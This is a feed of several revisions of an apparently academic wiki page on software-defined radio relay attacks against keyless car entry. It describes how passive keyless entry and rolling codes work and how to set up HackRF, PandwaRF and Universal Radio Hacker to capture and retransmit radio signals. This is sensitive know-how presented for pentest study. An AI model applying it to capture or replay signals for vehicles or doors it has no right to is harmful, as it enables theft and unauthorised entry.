We want to simulate a keyless car hacking situation. Therefore we want to interfere with a connection between a car and a car key during the unlocking process.&lt;br /&gt;
The key question is: How does a Passive Keyless Entry (PKE) system works? PKE communication is an electronic locking system which is mainly used for entering cars without the need of a key. The locking system uses passive components (keys) which will be activated by the car. The car constantly transmits its recognition signal, range is about 1.5-3 meters.&lt;br /&gt;
One of the most used systems is the so-called “keyless entry system”. Therefore, the car environment is surrounded by periodically low frequency signals about 130 kHz. If the right key is in this zone, the chip is reacting with those low frequencies and is creating an ID with ASK / FSK modulated signals.&lt;br /&gt;
Therefore, we got 2 possibilities:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; 1.     The car is sending a LF signal with some kind of “wake up signal”. &#039;&#039;&#039;&lt;br /&gt;
#  	The car is sending permanent wake up signals.&lt;br /&gt;
# 	If a “keyless entry key” is in the near of, an “Acknowledgement” is transmitted to the car.&lt;br /&gt;
#  	If the key and car fits together, an ID check is going to start.&lt;br /&gt;
# 	The car is sending an ID to the key – if it fits, the key is transmitting the right key code. If the key code fits to the one of the automotive, the car is opening.&lt;br /&gt;
&#039;&#039;&#039;2.     The car sends a LF signal with a car ID. &#039;&#039;&#039;&lt;br /&gt;
#  	Periodically a LF signal is transmitted by the car.&lt;br /&gt;
# 	If a “keyless entry key” is nearby and the ID fits to the one of the car’s, the key transmits the right “key code”. If the key code fits, the car is going to open.&lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
*Universal Radio Hacker&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
===Rolling Codes vs. Fixed Codes===&lt;br /&gt;
&lt;br /&gt;
Remote controls send a digital code word to the receiver. If the receiver considers the code as correct, the sender will do the stuff which it is programmed for. For example: opening a door, closing, blocking, holding or locking etc. Simple remote controls use fixed code word. That means the code word which opens the a door today, would open the door some time in the future with the same code word. An attacker who has the right device to capture a code, could easily capture the simple code and send it sometime later to open the door. Some safer systems would use so called &amp;quot;Rolling codes&amp;quot;. With rolling codes, hacker would be able to capture a signal, but to retransmit these signal, he need to know the algorithm behind the rolling code in order to open the door because the captured code is used already and therefore deleted in the code algorithm. The rolling code system uses an encryption method which allows the sender and the receiver to use share codewords in to make it harder for the attacker to steal the code. &lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License&amp;quot;. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code. &lt;br /&gt;
&lt;br /&gt;
Side Note: You won´t be able to use PandwaRF to open your car. After long researches and communication with the manufacturer, the car opener function is only allowed for the goverment or law enforcement.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF one ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
* Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website https://www.kali.org/docs/development/live-build-a-custom-kali-iso/&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable https://www.balena.io/etcher/&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
* Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig https://zadig.akeo.ie/&lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
#	Choose HackRF&lt;br /&gt;
#	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well (Only for Garage Openers), but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10379</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10379"/>
		<updated>2022-07-14T08:50:18Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Description */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
We want to simulate a keyless car hacking situation. Therefore we want to interfere with a connection between a car and a car key during the unlocking process.&lt;br /&gt;
The key question is: How does a Passive Keyless Entry (PKE) system works? PKE communication is an electronic locking system which is mainly used for entering cars without the need of a key. The locking system uses passive components (keys) which will be activated by the car. The car constantly transmits its recognition signal, range is about 1.5-3 meters.&lt;br /&gt;
One of the most used systems is the so-called “keyless entry system”. Therefore, the car environment is surrounded by periodically low frequency signals about 130 kHz. If the right key is in this zone, the chip is reacting with those low frequencies and is creating an ID with ASK / FSK modulated signals.&lt;br /&gt;
Therefore, we got 2 possibilities:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; 1.     The car is sending a LF signal with some kind of “wake up signal”. &#039;&#039;&#039;&lt;br /&gt;
#  	The car is sending permanent wake up signals.&lt;br /&gt;
# 	If a “keyless entry key” is in the near of, an “Acknowledgement” is transmitted to the car.&lt;br /&gt;
#  	If the key and car fits together, an ID check is going to start.&lt;br /&gt;
# 	The car is sending an ID to the key – if it fits, the key is transmitting the right key code. If the key code fits to the one of the automotive, the car is opening.&lt;br /&gt;
&#039;&#039;&#039;2.     The car sends a LF signal with a car ID. &#039;&#039;&#039;&lt;br /&gt;
#  	Periodically a LF signal is transmitted by the car.&lt;br /&gt;
# 	If a “keyless entry key” is nearby and the ID fits to the one of the car’s, the key transmits the right “key code”. If the key code fits, the car is going to open.&lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
*Universal Radio Hacker&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
===Rolling Codes vs. Fixed Codes===&lt;br /&gt;
&lt;br /&gt;
Remote controls send a digital code word to the receiver. If the receiver considers the code as correct, the sender will do the stuff which it is programmed for. For example: opening a door, closing, blocking, holding or locking etc. Simple remote controls use fixed code word. That means the code word which opens the a door today, would open the door some time in the future with the same code word. An attacker who has the right device to capture a code, could easily capture the simple code and send it sometime later to open the door. Some safer systems would use so called &amp;quot;Rolling codes&amp;quot;. With rolling codes, hacker would be able to capture a signal, but to retransmit these signal, he need to know the algorithm behind the rolling code in order to open the door because the captured code is used already and therefore deleted in the code algorithm. The rolling code system uses an encryption method which allows the sender and the receiver to use share codewords in to make it harder for the attacker to steal the code. &lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License&amp;quot;. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code. &lt;br /&gt;
&lt;br /&gt;
Side Note: You won´t be able to use PandwaRF to open your car. After long researches and communication with the manufacturer, the car opener function is only allowed for the goverment or law enforcement.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF one ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
* Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website https://www.kali.org/docs/development/live-build-a-custom-kali-iso/&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable https://www.balena.io/etcher/&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
** Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig https://zadig.akeo.ie/&lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
#	Choose HackRF&lt;br /&gt;
#	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well (Only for Garage Openers), but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10378</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10378"/>
		<updated>2022-07-14T08:42:59Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Pentesting with PandwaRF */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
We want to simulate a keyless car hacking situation. Therefore we want to interfere with a connection between a car and a car key during the unlocking process.&lt;br /&gt;
The key question is: How does a Passive Keyless Entry (PKE) system works? PKE communication is an electronic locking system which is mainly used for entering cars without the need of a key. The locking system uses passive components (keys) which will be activated by the car. The car constantly transmits its recognition signal, range is about 1.5-3 meters.&lt;br /&gt;
One of the most used systems is the so-called “keyless entry system”. Therefore, the car environment is surrounded by periodically low frequency signals about 130 kHz. If the right key is in this zone, the chip is reacting with those low frequencies and is creating an ID with ASK / FSK modulated signals.&lt;br /&gt;
Therefore, we got 2 possibilities:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; 1.     The car is sending a LF signal with some kind of “wake up signal”. &#039;&#039;&#039;&lt;br /&gt;
#  	The car is sending permanent wake up signals.&lt;br /&gt;
# 	If a “keyless entry key” is in the near of, an “Acknowledgement” is transmitted to the car.&lt;br /&gt;
#  	If the key and car fits together, an ID check is going to start.&lt;br /&gt;
# 	The car is sending an ID to the key – if it fits, the key is transmitting the right key code. If the key code fits to the one of the automotive, the car is opening.&lt;br /&gt;
&#039;&#039;&#039;2.     The car sends a LF signal with a car ID. &#039;&#039;&#039;&lt;br /&gt;
#  	Periodically a LF signal is transmitted by the car.&lt;br /&gt;
# 	If a “keyless entry key” is nearby and the ID fits to the one of the car’s, the key transmits the right “key code”. If the key code fits, the car is going to open.&lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
*Universal Radio Hacker&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License&amp;quot;. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code. &lt;br /&gt;
&lt;br /&gt;
Side Note: You won´t be able to use PandwaRF to open your car. After long researches and communication with the manufacturer, the car opener function is only allowed for the goverment or law enforcement.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF one ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
* Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website https://www.kali.org/docs/development/live-build-a-custom-kali-iso/&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable https://www.balena.io/etcher/&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
** Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig https://zadig.akeo.ie/&lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
#	Choose HackRF&lt;br /&gt;
#	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well (Only for Garage Openers), but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10377</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10377"/>
		<updated>2022-07-14T08:42:03Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Pentesting with PandwaRF */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
We want to simulate a keyless car hacking situation. Therefore we want to interfere with a connection between a car and a car key during the unlocking process.&lt;br /&gt;
The key question is: How does a Passive Keyless Entry (PKE) system works? PKE communication is an electronic locking system which is mainly used for entering cars without the need of a key. The locking system uses passive components (keys) which will be activated by the car. The car constantly transmits its recognition signal, range is about 1.5-3 meters.&lt;br /&gt;
One of the most used systems is the so-called “keyless entry system”. Therefore, the car environment is surrounded by periodically low frequency signals about 130 kHz. If the right key is in this zone, the chip is reacting with those low frequencies and is creating an ID with ASK / FSK modulated signals.&lt;br /&gt;
Therefore, we got 2 possibilities:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; 1.     The car is sending a LF signal with some kind of “wake up signal”. &#039;&#039;&#039;&lt;br /&gt;
#  	The car is sending permanent wake up signals.&lt;br /&gt;
# 	If a “keyless entry key” is in the near of, an “Acknowledgement” is transmitted to the car.&lt;br /&gt;
#  	If the key and car fits together, an ID check is going to start.&lt;br /&gt;
# 	The car is sending an ID to the key – if it fits, the key is transmitting the right key code. If the key code fits to the one of the automotive, the car is opening.&lt;br /&gt;
&#039;&#039;&#039;2.     The car sends a LF signal with a car ID. &#039;&#039;&#039;&lt;br /&gt;
#  	Periodically a LF signal is transmitted by the car.&lt;br /&gt;
# 	If a “keyless entry key” is nearby and the ID fits to the one of the car’s, the key transmits the right “key code”. If the key code fits, the car is going to open.&lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
*Universal Radio Hacker&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License&amp;quot;. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code. &lt;br /&gt;
&lt;br /&gt;
Side Note: You won´t be able to use PandwaRF to open your car. After long researches and communication with the manufacturer, the car opener function is only allowed for the goverment or law enforcement.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF one ===&lt;br /&gt;
&lt;br /&gt;
